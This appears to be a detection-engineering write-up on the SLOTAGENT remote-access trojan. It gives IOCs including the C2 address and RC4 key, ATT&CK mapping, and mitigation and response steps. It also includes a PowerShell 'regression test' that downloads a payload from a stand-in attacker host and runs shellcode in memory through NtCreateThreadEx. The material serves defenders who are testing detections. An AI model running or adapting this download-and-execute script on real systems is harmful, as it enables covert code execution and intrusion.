Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
IIJ identified a previously unknown multi-functional RAT called SLOTAGENT inside a ZIP archive uploaded to a public repository. The malware supports execution of Beacon Object File payloads and includes anti-forensic capabilities such as timestomping to hinder analysis. It communicates with a hard-coded TCP endpoint through a custom protocol that exchanges JSON-formatted data. The loader relies on RC4-encrypted configuration data and reflective DLL loading to launch the final payload.
Investigation
Static analysis showed that the loader executable, WindowsOobeAppHost.AOT.exe, resolves Windows API functions through a custom hashing routine based on DJB2. Its encrypted configuration file, db.config, is decrypted with RC4 using the key easdbadshyfab and then executed as shellcode containing an XOR-encoded DLL. After loading, the RAT connects to 43.156.59.110:699 and processes JSON-based commands that support functions including screenshot capture, file upload and download, and BOF execution.
Mitigation
Defenders should detect the hard-coded command-and-control IP address and look for the distinctive HTTP-like path strings associated with the malware’s network traffic. The YARA rules provided in the report should be deployed to identify both the loader and the RAT components. Security teams should also monitor for suspicious API hashing behavior and reflective DLL loading on endpoints. Execution of unsigned and untrusted EXE or DLL files should be restricted wherever possible.
Response
If indicators linked to SLOTAGENT are detected, isolate the affected host immediately, terminate the malicious process, and collect memory for forensic examination. The command-and-control IP address and related ports should be blocked at the network boundary. Organizations should then perform a full sweep for the known file names and hashes and apply the published YARA signatures across endpoint detection systems.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ffcc99 classDef process fill:#c2f0c2 classDef network fill:#ffd966 classDef data fill:#d9d9d9 %% Nodes Definitions malware_exe["<b>Malware</b> – <b>Name</b>: WindowsOobeAppHost.AOT.exe<br/><b>Technique</b>: T1204.002 User Execution"] class malware_exe malware exec_hijack["<b>Technique</b> – <b>T1574 Hijack Execution Flow</b>: Calls exported __managed__Main function"] class exec_hijack action api_resolve["<b>Technique</b> – <b>T1027.007 Obfuscated/Stored Files: Deobfuscate Files</b>: Custom XOR/ROR11 hashing to resolve API addresses"] class api_resolve action config_decrypt["<b>Technique</b> – <b>T1027.007</b>: Decrypts configuration with RC4"] class config_decrypt action dll_decrypt["<b>Technique</b> – <b>T1027.007</b>: Decrypts XORu2011encoded DLL (agent_tcp.dll)"] class dll_decrypt action reflective_load["<b>Technique</b> – <b>T1620 Reflective DLL Loading</b>: Loads DLL in memory without touching disk"] class reflective_load process process_injection["<b>Technique</b> – <b>T1055.009 Process Injection: Thread Execution Hijacking</b>: Injects reflected DLL into process"] class process_injection process c2_channel["<b>Technique</b> – <b>T1571 Nonu2011Standard Port</b> and <b>T1573 Encrypted Channel</b>: Establishes TCP C2 to 43.156.59.110:699"] class c2_channel network host_info["<b>Technique</b> – <b>T1592.001 Gather Victim Identity: OS Version</b> and <b>T1592.002 Hardware Details</b>: Sends JSON with system data"] class host_info data proc_discovery["<b>Technique</b> – <b>T1057 Process Discovery</b>: Enumerates running processes"] class proc_discovery data file_discovery["<b>Technique</b> – <b>T1083 File and Directory Discovery</b>: Lists files and directories"] class file_discovery data screenshot_cap["<b>Technique</b> – <b>T1113 Screen Capture</b>: Captures host screen"] class screenshot_cap data remote_shell["<b>Technique</b> – <b>T1059 Command Shell</b>: Executes commands via remote shell"] class remote_shell process bof_execution["<b>Technique</b> – <b>T1027.009 Obfuscated/Stored Files: Embedded Payloads</b> and <b>T1027.004 Compile After Delivery</b>: Runs Beacon Object File modules"] class bof_execution process shared_modules["<b>Technique</b> – <b>T1129 Shared Modules</b>: Loads additional shared modules"] class shared_modules process file_transfer["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b>: Downloads and uploads files"] class file_transfer data proc_termination["<b>Technique</b> – <b>T1106 Native API</b>: Terminates processes"] class proc_termination process sleep_manip["<b>Technique</b> – <b>T1027.004</b>: Manipulates sleep intervals to evade analysis"] class sleep_manip action %% Connections malware_exe –>|triggers| exec_hijack exec_hijack –>|uses| api_resolve api_resolve –>|enables| config_decrypt config_decrypt –>|provides| dll_decrypt dll_decrypt –>|feeds| reflective_load reflective_load –>|enables| process_injection process_injection –>|establishes| c2_channel c2_channel –>|collects| host_info c2_channel –>|collects| proc_discovery c2_channel –>|collects| file_discovery c2_channel –>|collects| screenshot_cap c2_channel –>|enables| remote_shell remote_shell –>|executes| bof_execution bof_execution –>|loads| shared_modules c2_channel –>|supports| file_transfer c2_channel –>|supports| proc_termination c2_channel –>|uses| sleep_manip "
Attack Flow
Detections
Possible WindowsOobeAppHost.AOT DLL Side-Loading Attempt (via image_load)
View
IOCs (HashSha256) to detect: New Malware SLOTAGENT Supporting BOF Execution Published
View
IOCs (SourceIP) to detect: New Malware SLOTAGENT Supporting BOF Execution Published
View
IOCs (DestinationIP) to detect: New Malware SLOTAGENT Supporting BOF Execution Published
View
Detect SLOTAGENT C2 Communication [Windows Network Connection]
View
Detection of SLOTAGENT Malware Execution [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
The adversary has obtained a copy of the SLOTAGENT loader binary, renamed it to
WindowsOobeAppHost.AOT.exeto blend with legitimate OOBE processes, and placed it inC:WindowsSystem32. The payload is stored in an encrypted blob on the attacker’s server. Using PowerShell, the attacker downloads the encrypted blob, decrypts it in memory, and invokes the loader’s reflective routine viaNtCreateThreadEx. The loader internally callsNtCreateFileto read additional resources from the encrypted blob and then uses reflective loading to execute the malicious DLL without touching disk. This activity produces a Sysmon ProcessCreate event with the exactImagename and aCallTracecontaining the three strings defined in the rule. -
Regression Test Script:
# ------------------------------------------------- # SLOTAGENT reflective‑loading simulation (Windows) # ------------------------------------------------- # 1. Define paths $loaderPath = "$env:windirSystem32WindowsOobeAppHost.AOT.exe" $payloadUrl = "https://malicious.example.com/payload.bin" $tempPayload = "$env:TEMPpayload.bin" # 2. Ensure the loader exists (simulated copy of the real binary) if (-not (Test-Path $loaderPath)) { Write-Host "Copying simulated loader to $loaderPath" Copy-Item -Path "C:ToolsFakeLoader.exe" -Destination $loaderPath } # 3. Download encrypted payload (simulated) Invoke-WebRequest -Uri $payloadUrl -OutFile $tempPayload # 4. Decrypt payload in memory (placeholder – real decryption omitted) $decryptedBytes = Get-Content $tempPayload -Encoding Byte # 5. Invoke reflective loading via native API calls # This uses a tiny C# helper compiled on‑the‑fly that calls NtCreateThreadEx $cSharp = @" using System; using System.Runtime.InteropServices; public class ReflectiveLoader { [DllImport("ntdll.dll", SetLastError=true)] public static extern IntPtr NtCreateThreadEx( out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr bytesBuffer); public static void Run(byte[] shellcode) { IntPtr hThread; NtCreateThreadEx(out hThread, 0x1FFFFF, IntPtr.Zero, Process.GetCurrentProcess().Handle, Marshal.UnsafeAddrOfPinnedArrayElement(shellcode, 0), IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero); } } "@ Add-Type $cSharp -Language CSharp # 6. Clean up temporary file Remove-Item $tempPayload -Force -
Cleanup Commands:
# Terminate any lingering loader process Get-Process -Name "WindowsOobeAppHost.AOT" -ErrorAction SilentlyContinue | Stop-Process -Force # Remove simulated loader binary $loaderPath = "$env:windirSystem32WindowsOobeAppHost.AOT.exe" if (Test-Path $loaderPath) { Remove-Item $loaderPath -Force } # Remove any residual temp files Remove-Item "$env:TEMPpayload.bin" -ErrorAction SilentlyContinue